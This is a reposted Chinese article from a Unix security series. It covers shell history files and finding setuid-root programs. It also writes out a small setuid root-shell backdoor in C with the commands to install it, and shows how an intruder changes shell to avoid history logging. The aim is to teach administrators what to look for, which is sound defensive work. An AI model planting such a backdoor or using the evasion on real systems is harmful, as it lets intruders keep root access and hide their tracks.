[转载]系统安全问题（2）

  信息来源：weblog.eviloctal.com

3. 历史文件:

  ksh、csh、sh、bash、zsh都可保存历史文件。其文件如下:
  sh:  .sh_history  (sh 也即Bourne shell)
  csh:  .history
  ksh:  .sh_history
  bash: .bash_history
  zsh:  .history

   在运行sh和ksh的用户的相应.profile中，加入HISTORY=100，可指定.sh_history文件保存该用户最近运行的100条记录。对于csh，则在.cshrc文件中加入, set history=100,则可。用户可以运行history指令来查看历史文件中的内容。对于Ksh、sh 也可运行 tail -f .sh_history 来查看，其顺序是从最近的运行的指令开始。而C shell 是在退出才能更新文件，所以不能用tail来观察C shell执行了那些命令。
   这些历史文件比进程记帐更为有用，因为命令的参数也被保留下来，所以可通过执行执行命令的上下文联系察觉到用户干了些什么。但话又说回来, 其实这只起到一定作用而已。
   
  附注: .profile用于Bourne和Korn shell; .login和.cshrc用于C shell。
   
4. 找出属主为root且带s位的程序:
   以root身份执行以下的指令, 找出此类文件，看看是否有可疑的程序存在。

   #find / -perm -4000 -exec /bin/ls -lab {}  ";"

   其实在以前post的文章 1284 "系统安全技术的研究" 已有讨论过如何得到root shell当hacker进入系统后,大部份是利用buffer overflow取得root shell。例如:solaris 中带s位的fdformat,ufsdump,ping等;AIX中xlock;SGI中的xlock; digital中的dop;等等，都给hacker找出其漏洞。当hacker利用这些big bugs取的root shell后，若其想以后还想入侵此系统的话，当然是留下root shell的程序，此时hakcer也不关心原来的bugs是否给fix掉，他/她不再需要利用bug了，只须运行自己留下的root shell即给。
   以下给出得到root shell的简单程序:

   #cat getrootshell.c  
    void main(void)
    {
     setuid(0,0);
     execl("/bin/sh", "sh",0);
    }

编译后得到bin文件。此时，还有重要的步骤没做，是什么，请看下面：

#cc -o getrootshell getrootshell.c
#chmod 4777 getrootshell
#chown root:other getrootshell
#ls -al getrootshell
-rwsrwxrwx  1 root    other       5 Oct 12 06:14 getrootshell
   (注意全过程是在取的rootshell后，才可这样做)

   这样hacker就在该系统中留下了后门，下次入来后就不需利用还没fix的 fdformat,xlock,dop等bug  的程序了，直接运行getrootshell程序，就可跳成root了,想  干啥就干啥了。因此，管理员要查清此类型的文件。


现在从攻的角度来看上面两点防卫措施:

   1. 对于history文件，当hacker进入系统后可以改变shell类型，来使保存他后来所有指令的
     history文件失效。因此，当hacker用crack到的帐号进入系统后，第一条所敲的指令是改变
     shell类型的指令. 在digital unix系统下:

   c:\>telnet XXX.XXX.XXX.XXX
      Digital UNIX (center) (ttyp5)

      login: tommy
      Password:
      Last login: Sun Oct 11 22:43:51 from HPVC.com

      Digital UNIX V4.0A  (Rev. 464); Sat Feb  7 19:54:12 GMT+0800 1998

      The installation software has successfully installed your system.

      There are logfiles that contain a record of your installation.
      These are:

      /var/adm/smlogs/install.cdf    - configuration description file
      /var/adm/smlogs/install.log    - general log file
      /var/adm/smlogs/install.FS.log  - file system creation logs
      /var/adm/smlogs/setld.log     - log for the setld(8) utility
      /var/adm/smlogs/fverify.log    - verification log file

      center>chsh
      Old shell: /bin/sh
      New shell: ksh
   其他系统不在此一一列举。

   2. 对于类似getrootshell的bin文件,hacker也不会真的那么愚蠢到起这个名字，且他们会将
     此类型的程序藏在不易察觉的目录下，如果不是老练的管理员是不会发现的,这会在下节提
     到。(注:一般来说,hacker不会把getrootshell文件删除的，因为他也不能肯定下次进入系
     统时那些bugs还是否可以利用,使其变root)